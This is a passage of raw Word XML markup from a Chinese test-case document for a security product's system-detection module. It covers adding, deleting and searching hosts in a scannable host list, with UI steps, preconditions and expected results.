              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>新增主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1AC54D4C" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F190B7E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>测试</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>目标</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EDACBB3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>新增一个主机到可扫描的主机列表中</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="26A7F436" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E332A16"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2BE260CA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>系统检测功能相关组件全部开启，病毒库更新到最新</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="08D930D0" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14507265"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6D4137B3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>进入系统检测页面；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A02B1E7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击主机列表上方的“新增”按钮；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="546FF011" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F437E04" wp14:editId="3B465611">
                  <wp:extent cx="4175760" cy="2707640"/>
                  <wp:effectExtent l="0" t="0" r="15240" b="1016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175760" cy="2707640"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="65598D79" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>填写主机信息；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="379537DE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14609243" wp14:editId="57D7BDC6">
                  <wp:extent cx="2780665" cy="2542540"/>
                  <wp:effectExtent l="0" t="0" r="13335" b="2286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3">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:srcRect l="18195" t="16699" r="14899" b="4073"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2780986" cy="2542786"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="728D227A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击“连接测试”按钮；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B709291" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>“测试连接成功”弹窗的</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>确认按钮；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18B37C0D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A983FEE" wp14:editId="0DD94FA0">
                  <wp:extent cx="4104005" cy="2891155"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="4445"/>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4104005" cy="2891155"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="38AABB1E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>弹窗右</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>下角的确认按钮；</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4E066C3F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F3256E9"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193CD6BA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>新增一个主机</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，成功显示在主机列表中。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="55B7EA70" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67737C15"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546C319B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BA9B072" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="390" w:name="_Toc36487977"/>
      <w:r w:rsidRPr="00536672">
        <w:t>删除主机</w:t>
      </w:r>
      <w:bookmarkEnd w:id="390"/>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14B1BA7B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07E2AC28"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1DF32A7D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>删除主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="251821FE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="014BB596"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5081F81C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>从主机列表中删除</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>一个主机</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4D4A1B74" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29DCC7B8"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15E6AB66" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>系统检测功能相关组件全部开启，病毒库更新到最新</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0F47E26B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F0C2235"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7F8928C3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>进入系统检测页面；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BEDB50E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击列表左侧复选框，选中主机列表中一个主机；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7947A96F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击主机列表上方的“删除”按钮；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D3BEEE0"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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64D06F82" wp14:editId="2B52CBE2">
                  <wp:extent cx="4104005" cy="2680970"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="11430"/>
                  <wp:docPr id="550" name="图片 550" descr="C:\Users\PC-2\AppData\Local\Temp\1529485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PC-2\AppData\Local\Temp\1529485483(1).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4104005" cy="2680970"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="33A19CEB" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53C5CA95"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65F99A4E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>成功删除列表中的一个主机</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="17B3B917" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A0DC381"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5D12076D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64D06EAF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="391" w:name="_Toc36487978"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索主机</w:t>
      </w:r>
      <w:bookmarkEnd w:id="391"/>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58C36F7E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B332CC8"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6549BC23" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>搜索主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="231CDFFB" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C991A60"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7895BA66" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>根据输入的关键字从主机列表中搜索</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>主机</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0CC3A473" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25C95CA7"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38F43C8C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>系统检测功能相关组件全部开启，病毒库更新到最新</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
